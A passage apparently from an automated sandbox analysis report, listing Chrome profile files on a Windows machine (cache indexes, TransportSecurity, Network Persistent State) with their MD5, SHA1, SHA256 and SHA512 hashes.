| SHA1 | 99f604f67f17fa0c4cfe2cbc01ec201272e8aa1c |
| SHA256 | 0830e074758abecdaee7d6bca02a29cecf9ca3fb742199bc0daded77f1b92c65 |
| SHA512 | b1061988454346f884146337f64672a2cd0f303e8de0c324bf2da51c90defcec187f561d691aaf501702bdfa68d9eb1c29449ecb1c89f8d05fa40625bcc0a533 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ae1bccd6831ebfe5ad03b482ee266e4f |
| SHA1 | 01f4179f48f1af383b275d7ee338dd160b6f558a |
| SHA256 | 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649 |
| SHA512 | baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a9b66.TMP
| MD5 | 2c47aea4b71623f7b0af4815a988241d |
| SHA1 | 1d05244b1ad125a58dd2596227ddece2d3891fdb |
| SHA256 | 84d55ff1af748d85909d25f0f7d2a986e0310ad10da26d0e53c98c22d072644c |
| SHA512 | f71334d5e0a63ee4472979291ec05d8d4987527b1ae69a4bb590d3dd2b550b7d9dc25c981f158d4d63be4934e3b187b1fb30fb91fbc84ccc4313d341358dae3a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 61e739fc6df6dd2d8803140546c51901 |
| SHA1 | 1680e5355112bfea03cfce714f5db2e278525ad4 |
| SHA256 | 76ca425e9937f8f5c7494e67b8d697ad2b44c8ad538282da04f2fcb82dc28f97 |
| SHA512 | 3a3dc3496117812d5627b0c7b0d218d48a3fddbde9bdb8ef1dd32a56bd43ff07e6b70224d9c608d358e4a8f84c09f548205c7df3ba08fe990b4036bfe504a8d4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c9518e5abd2974b1b23d55ae7d0075fe |
| SHA1 | 01f610bcbfb4fb48f21d908927d8c4936ca3f780 |
| SHA256 | 34ab64f0ff435be6a98d8d040e5b9c8ad71051d88f48357b6f6de7df089b5038 |
| SHA512 | b2469bc6696872f4800aadb5ff9ee2826e75db5610abaaa28fd87d348f28db68b1cd1bb10fe343683c3e18426b00c8fea84068ce7bcc21958853406cd3b66193 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b20132586c8c09ca9da997290ab8200d |
| SHA1 | 06acb22b04cc706d7cb650efb1cec16530651028 |
| SHA256 | 84683c5281d3b68baf14fc1f1aa7b4c339cb26421f934afa8158ca7780c59832 |
| SHA512 | 41efac37eeefc19d6e9d138fd13018183041a0fbdf2bce6fc3bfb6d70297463ae1f927cb432eb57b6acc6fd5cf6fe22436f9c958f01e291f5b6180227d1b174d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8fc6ad1741c82e275975fd65cf475b75 |
| SHA1 | 776cbda55b646e628ff38fc291f78868e0848e57 |
| SHA256 | 8c1719cee028b7c6f9e4d1b858cedc7b0f18371c85a85d3cdcca74e579b43030 |
| SHA512 | e0221ec4ff3c3bfaf8699ce630d46e8a69d161464455659810787409fd06de46beb5f24ea85b0ebaa30c5e617d05efb40e83f26969bb0a1ff82ea8f0c7723d16 |